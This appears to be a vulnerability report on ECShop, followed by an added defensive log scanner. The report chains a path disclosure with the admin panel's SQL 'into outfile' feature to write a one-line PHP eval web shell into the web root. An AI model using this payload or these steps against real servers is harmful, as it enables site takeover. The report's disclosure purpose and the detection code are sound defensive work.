### Brief description:

Non-template

### Details:

Path disclosure + SQL statement execution = getshell

0x01. Trigger a path disclosure to obtain the physical path

```
http://127.0.0.1/ecshop/languages/en_us/common.php
```

[![w01.jpg](https://images.seebug.org/upload/201305/291249512cab52a7902db11104118947238fe75f.jpg)](https://images.seebug.org/upload/201305/291249512cab52a7902db11104118947238fe75f.jpg)

0x02. On the admin back end's SQL statement execution page, use `into outfile` to write a file; combined with the physical path obtained in the previous step, this yields a shell.

Enter the following in the SQL statement field (物理路径 stands for the physical path):

```
select "<?php @eval($_POST['c']);?>" into outfile '物理路径//test.php';
```

[![w02.jpg](https://images.seebug.org/upload/201305/2912524761a3032f832eb6cd1cc667c01a4821b8.jpg)](https://images.seebug.org/upload/201305/2912524761a3032f832eb6cd1cc667c01a4821b8.jpg)

0x03. Submit the statement for execution; MySQL then reports an error.

[![w03.jpg](https://images.seebug.org/upload/201305/29125324844fbb35e9541dd3505142151c95b54e.jpg)](https://images.seebug.org/upload/201305/29125324844fbb35e9541dd3505142151c95b54e.jpg)

0x04. Look again, and the lovely shell is already there.

[![w04.jpg](https://images.seebug.org/upload/201305/291254004ba2c082864e3ed05d8b008176123e86.jpg)](https://images.seebug.org/upload/201305/291254004ba2c082864e3ed05d8b008176123e86.jpg)

### Proof of vulnerability:

[![w04.jpg](https://images.seebug.org/upload/201305/291255493f34cd6ab97ee03312acfd1bba70c66c.jpg)](https://images.seebug.org/upload/201305/291255493f34cd6ab97ee03312acfd1bba70c66c.jpg)
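
A defender-side check for the file write described in step 0x02, as an added example that is not part of the original report: it scans MySQL query-log lines for `INTO OUTFILE` / `INTO DUMPFILE` statements and ranks each write target by whether it has a script extension and whether it lands under the web root. The log lines, web-root path, extension list and function names are constructed assumptions.

```python
import posixpath
import re

# Extensions the web server may execute (assumed list; adjust per deployment).
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp"}

# Matches: INTO OUTFILE|DUMPFILE '<path>' with either quote style.
OUTFILE_RE = re.compile(
    r"\binto\s+(?:outfile|dumpfile)\s+(['\"])(?P<path>.*?)\1",
    re.IGNORECASE,
)

def _norm(path):
    """Collapse repeated path separators and lowercase for comparison."""
    return re.sub(r"[\\/]+", "/", path).lower()

def classify(path, web_roots):
    """Rank one write target as high, medium or info."""
    norm = _norm(path)
    is_script = posixpath.splitext(norm)[1] in SCRIPT_EXTS
    in_root = any(norm.startswith(_norm(r).rstrip("/") + "/") for r in web_roots)
    if is_script and in_root:
        return "high"      # executable file written inside the web root
    if is_script or in_root:
        return "medium"    # one of the two conditions holds
    return "info"          # e.g. a CSV export to a backup directory

def scan(lines, web_roots):
    """Return (line number, severity, target path) for every file write found."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for m in OUTFILE_RE.finditer(line):
            path = m.group("path")
            findings.append((lineno, classify(path, web_roots), path))
    return findings

# Constructed sample log lines (not taken from the report).
SAMPLE_LOG = """\
130529 12:52:47  12 Query  select "placeholder" into outfile 'D:/wwwroot/ecshop//test.php'
130529 12:53:02  12 Query  SELECT * FROM ecs_goods INTO OUTFILE '/var/backups/goods.csv'
130529 12:53:10  13 Query  select 1 into dumpfile "/tmp/a.PHP"
130529 12:53:15  13 Query  SELECT goods_name FROM ecs_goods WHERE goods_id = 5
""".splitlines()
WEB_ROOTS = ["D:\\wwwroot"]  # assumed web root for the sample

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, WEB_ROOTS):
        print(finding)
```

On the server side, MySQL's `secure_file_priv` setting and withholding the `FILE` privilege from the application's database account restrict where such statements can write.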